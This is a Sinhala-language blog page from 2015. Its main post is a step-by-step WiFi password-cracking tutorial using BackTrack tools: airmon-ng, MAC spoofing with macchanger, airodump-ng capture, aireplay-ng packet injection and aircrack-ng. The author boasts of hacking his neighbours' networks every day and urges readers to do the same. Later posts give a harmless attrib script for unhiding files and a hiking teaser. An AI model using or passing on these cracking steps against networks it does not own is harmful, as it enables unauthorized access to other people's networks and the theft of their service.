Monday, December 28, 2015

කාඩ්වලින් සුපිරිම මැජික් එකක් බලමුද?






(J.M. THARINDU SHEHAN RAMANAYAKA)
(ALL IN ONE BLOG PRODUCTION SRI-LANKA)
(MALIYADEWA ADARSHA M.V. KURUNEGALA)


WIFI password එකක් හැක් කරමු

ඔන්න යාළුවනේ අදත් අපේ කට්ට්ය වෙනුවෙන් මන් අරන් ආවා HACKING යටතේ සුපිරි පොස්ට් එකක්...මේක නං අනිත් පොස්ට් වගේ නෙමෙයි තරමක් සංකීර්ණ කටයුත්තක්...හරි අද අපේ වැඩේ තමයි...WIFI password එකක් හැක් කිරීම.හරිම ලේසි...බය වෙන්න දෙයක් නෑ
ඕනෙම wifi එකක් හැක් කරන්න පුළුවන්...අපේ ගේ අවට ඉන්නවා wifi තියෙන ලෝබ මිනිස්සු ජාතියක් මට උන්ව පෙන්නන්න බෑ ඒක නිසා මන් උන්ගෙන් ගන්න පාලියක් හැටියට හැමදාම wifi හැක් කරනවා...ඕගොල්ලෝ පොඩ්ඩක් බලන්නකෝ මන් හැමදාම facebook එකේ online...හෙ හේ...මේක 100% වැඩ වැරදුනොත් ආයි උත්සහ කරන්න එහෙනං අපි වැඩේට බහිමු...

wifi
හැක් කරන්න ඕනෙනං ඉතින් අනිවා පල්ලෙහා ටික ඕන වෙනවා



Linux BackTrack 5r3 DVD
Compatible Wireless Adapter


මන් දන්නවා ඔයාලා ගාව Compatible Wireless Adapter එකක් තියෙන බව BackTrack 5r3 නැති අය එ්ක බාගන්න. මෙන්න Link එක.....


http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/
 දැන් Virtuual Machine එකෙන් ඔයාගේ පරිගණකයට ස්ථාපනය කරගන්න..මමනං ඕකට යොදා ගත්තේ VmWare කියන software එක..

ඔන්න දැන් තමයි වැඩේට enter වෙන්නේ...
ඔයාලා BackTrack 5r3 බාගත්තනේ..හරි දැන් ඔයා Shell Commands එකක් ඕපන් කරගන්න..එකේ ඔය පල්ලෙහා දාලා තියෙන එක දුන්නම දැනට තියෙන wifi network ටික ඔක්කොම පෙන්නනවා airmon-ng



ඔතන තියෙන rao කියන එක ත්මි මම දිගටම පාවිච්චි කරන්නේ...ඔයාලත් දැන් මේ rao එක හොයන්න යන්න එපා..rao කියනේ මන් හැක් කරන්න ඉන්න wifi network එක..ඔයාලා ගන්න ඔයාලගේ network එක 


දැන් පල්ලෙහා තියෙන එක දෙන්න 

airmon-ng stop ra0



අපි මෙතනදී කරන දේ තමයි WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන එක 
දැන් ඔය පල්ලෙහා එක දෙන්න..

ifconfig ra0 down



දැන් පල්ලෙහා එක දෙන්න 

macchanger --mac 00:11:22:33:44:55 ra0




දැන් පල්ලෙහා එක දෙන්න 

airmon-ng start ra0




මෙන්න මෙතැනදී අපි බලන්නේ අලුත් කරපු මැක් ඇඩ්ර්ස් එක හරිද කියල බලන එක..
දැන් පල්ලෙහා එක දෙන්න 

airodump-ng ra0


මේකෙ BSSID Code එක Copy කරල තියාගන්න එක අපිට ඉස්සරහට ඕන වෙනවා...

දැන් පල්ලෙහා එක දෙන්නකෝ..

airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0



මෙතනදී අපිට හරියටම හොයා ගන්න පුළුවන් WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න...ඊට පස්සේ අපිට හැකිවෙනවා අපි හැක් කරන්න යන wifi network එකට දැන් ලොග් වෙලා ඉන්න කෙනෙක්ව හොයාගන්න..
දැන් පල්ලෙහා එක දෙන්නකෝ 

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0



දැන් පල්ලෙහා එක දෙන්න 

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0



 දැන් පල්ලෙහා එක දෙන්න 

aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)



ඔන්න දැන් ඉතින් අපි password එක හොයාගත්ත හරිය..දැන් ඕව ගහල කරලා ඉන්ටනෙට් එකම බාගනිල්ලා..



මන් හිතනවා මේක අපේ හැම කෙනෙක්ටම වැදගත් වෙයි කියලා එහෙනං ගිහින් එන්නන් සුභ දවසක්...කමෙන්ට් එකක් දාල යන්න අමතක කරන්න එපා හොදේ..









 (J.M. THARINDU SHEHAN RAMANAYAKA)

(ALL IN ONE BLOG PRODUCTION SRI-LANKA)                                                                                     

(MALIYADEWA ADARSHA M.V. KURUNEGALA)






























VIROUS GUARD නැතුව Short Cut VIROUS එක අයින් කරමු


ඔන්න අද මම ඔයාලට කියල දෙන්න යන්නෙ කොහොමද VIROUS GUARD එකක් නැතුව Short Cut VIROUS එක අයින් කරන්නෙ කියලා.....

එ්ක හරිම ලේසියි......ඔයාලට කරන්න තියෙන්නෙ මම කියන මේ Steps ටික Follow කරන්න විතරයි.......



Step 1

  • Notepad එක ගන්න....



Steps 2

  • මේ පල්ලෙහා තියන පිලිවෙලට මේ CODE ටික type කරන්න..........



                                          @echo off
                            attrib -h -s -r -a /s /d C:\*.*
                            attrib -h -s -r -a /s /d D:\*.*
                            attrib -h -s -r -a /s /d E:\*.
                        
                           @echo complete.



  • මේකෙ C,D,E  කියල තියෙන්නෙ මගෙ එකේ තියන Local Disk වල නම්........ඔයාලට මීට වඩා තියනවනම් මේ විදිහට CODE type කරන්න පුළුවන්......

                               attrib -h -s -r -a /s /d F:\*.*
                               attrib -h -s -r -a /s /d G:\*.*



  • එතකොට ඔයාලගෙ CODE එක type වෙන්නෙ මෙහෙම......‍



                                 @echo off
                                 attrib -h -s -r -a /s /d C:\*.*
                                 attrib -h -s -r -a /s /d D:\*.*
                                 attrib -h -s -r -a /s /d E:\*.*
                                 attrib -h -s -r -a /s /d F:\*.*
                                 attrib -h -s -r -a /s /d G:\*.*
                                 @echo complete.



  • ඔයාලගෙ Disk අඩු නම් එ් අදාල නැති Local Disk වල Code Delete  කරන්න........එතකොට CODE එක මේ වගේ....



                                  @echo off
                                  attrib -h -s -r -a /s /d C:\*.*                                   
                                  @echo complete.



Step 3

  • දැන් මේක Command Prompt (CMD Pad) එකට copy  කරලා  run වෙන්න දෙන්න..............
  • හැබැයි ඔයාලා Local Disk වල නම් හරියට type කර නැත්තම් මේ CODE වැඩ කරන්නෙ නෑ........



ඔන්න යාළුවනේ ඔයාලගේ Short Cut VIROUS එක දැන් හොයන්නත් නෑ...................



මන් හිතනවා මේක අපේ හැම කෙනෙක්ටම වැදගත් වෙයි කියලා එහෙනං ගිහින් එන්නන් සුභ දවසක්...කමෙන්ට් එකක් දාල යන්න අමතක කරන්න එපා හොදේ..



( J.M. THARINDU SHEHAN RAMANAYAKA ) 

( ALL IN ONE BLOG PRODUCTION SRI-LANKA )

( MALIYADEWA ADARSHA M.V. KURUNEGALA )


Pettigala Hike Kandy SriLanaka පෙට්ටිගල කන්ද (Also called Pethiyagala | Bambaragala)

About more details Visit the URL given below;  https://www.youtube.com/watch?v=U3EDfTJUMjA&t=46s           Pettigala, also known as Peth...